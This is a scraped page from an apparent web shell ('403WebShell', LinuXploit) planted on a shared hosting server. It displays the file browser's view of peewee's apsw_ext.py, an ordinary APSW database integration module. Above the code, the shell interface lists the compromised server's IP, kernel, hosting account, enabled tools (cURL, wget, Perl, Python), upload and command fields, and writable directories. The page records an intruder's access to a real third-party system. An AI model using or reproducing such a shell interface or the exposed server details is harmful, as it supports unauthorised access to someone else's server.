Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.135.184.124
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/imunify360/venv/lib/python3.11/site-packages/playhouse/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/imunify360/venv/lib/python3.11/site-packages/playhouse/apsw_ext.py
"""
Peewee integration with APSW, "another python sqlite wrapper".

Project page: https://rogerbinns.github.io/apsw/

APSW is a really neat library that provides a thin wrapper on top of SQLite's
C interface.

Here are just a few reasons to use APSW, taken from the documentation:

* APSW gives all functionality of SQLite, including virtual tables, virtual
  file system, blob i/o, backups and file control.
* Connections can be shared across threads without any additional locking.
* Transactions are managed explicitly by your code.
* APSW can handle nested transactions.
* Unicode is handled correctly.
* APSW is faster.
"""
import apsw
from peewee import *
from peewee import __exception_wrapper__
from peewee import BooleanField as _BooleanField
from peewee import DateField as _DateField
from peewee import DateTimeField as _DateTimeField
from peewee import DecimalField as _DecimalField
from peewee import Insert
from peewee import TimeField as _TimeField
from peewee import logger

from playhouse.sqlite_ext import SqliteExtDatabase


class APSWDatabase(SqliteExtDatabase):
    server_version = tuple(int(i) for i in apsw.sqlitelibversion().split('.'))

    def __init__(self, database, **kwargs):
        self._modules = {}
        super(APSWDatabase, self).__init__(database, **kwargs)

    def register_module(self, mod_name, mod_inst):
        self._modules[mod_name] = mod_inst
        if not self.is_closed():
            self.connection().createmodule(mod_name, mod_inst)

    def unregister_module(self, mod_name):
        del(self._modules[mod_name])

    def _connect(self):
        conn = apsw.Connection(self.database, **self.connect_params)
        if self._timeout is not None:
            conn.setbusytimeout(self._timeout * 1000)
        try:
            self._add_conn_hooks(conn)
        except:
            conn.close()
            raise
        return conn

    def _add_conn_hooks(self, conn):
        super(APSWDatabase, self)._add_conn_hooks(conn)
        self._load_modules(conn)  # APSW-only.

    def _load_modules(self, conn):
        for mod_name, mod_inst in self._modules.items():
            conn.createmodule(mod_name, mod_inst)
        return conn

    def _load_aggregates(self, conn):
        for name, (klass, num_params) in self._aggregates.items():
            def make_aggregate():
                return (klass(), klass.step, klass.finalize)
            conn.createaggregatefunction(name, make_aggregate)

    def _load_collations(self, conn):
        for name, fn in self._collations.items():
            conn.createcollation(name, fn)

    def _load_functions(self, conn):
        for name, (fn, num_params) in self._functions.items():
            conn.createscalarfunction(name, fn, num_params)

    def _load_extensions(self, conn):
        conn.enableloadextension(True)
        for extension in self._extensions:
            conn.loadextension(extension)

    def load_extension(self, extension):
        self._extensions.add(extension)
        if not self.is_closed():
            conn = self.connection()
            conn.enableloadextension(True)
            conn.loadextension(extension)

    def last_insert_id(self, cursor, query_type=None):
        if not self.returning_clause:
            return cursor.getconnection().last_insert_rowid()
        elif query_type == Insert.SIMPLE:
            try:
                return cursor[0][0]
            except (AttributeError, IndexError, TypeError):
                pass
        return cursor

    def rows_affected(self, cursor):
        try:
            return cursor.getconnection().changes()
        except AttributeError:
            return cursor.cursor.getconnection().changes()  # RETURNING query.

    def begin(self, lock_type='deferred'):
        self.cursor().execute('begin %s;' % lock_type)

    def commit(self):
        with __exception_wrapper__:
            curs = self.cursor()
            if curs.getconnection().getautocommit():
                return False
            curs.execute('commit;')
        return True

    def rollback(self):
        with __exception_wrapper__:
            curs = self.cursor()
            if curs.getconnection().getautocommit():
                return False
            curs.execute('rollback;')
        return True

    def execute_sql(self, sql, params=None):
        logger.debug((sql, params))
        with __exception_wrapper__:
            cursor = self.cursor()
            cursor.execute(sql, params or ())
        return cursor


def nh(s, v):
    if v is not None:
        return str(v)

class BooleanField(_BooleanField):
    def db_value(self, v):
        v = super(BooleanField, self).db_value(v)
        if v is not None:
            return v and 1 or 0

class DateField(_DateField):
    db_value = nh

class TimeField(_TimeField):
    db_value = nh

class DateTimeField(_DateTimeField):
    db_value = nh

class DecimalField(_DecimalField):
    db_value = nh

Youez - 2016 - github.com/yon3zu
LinuXploit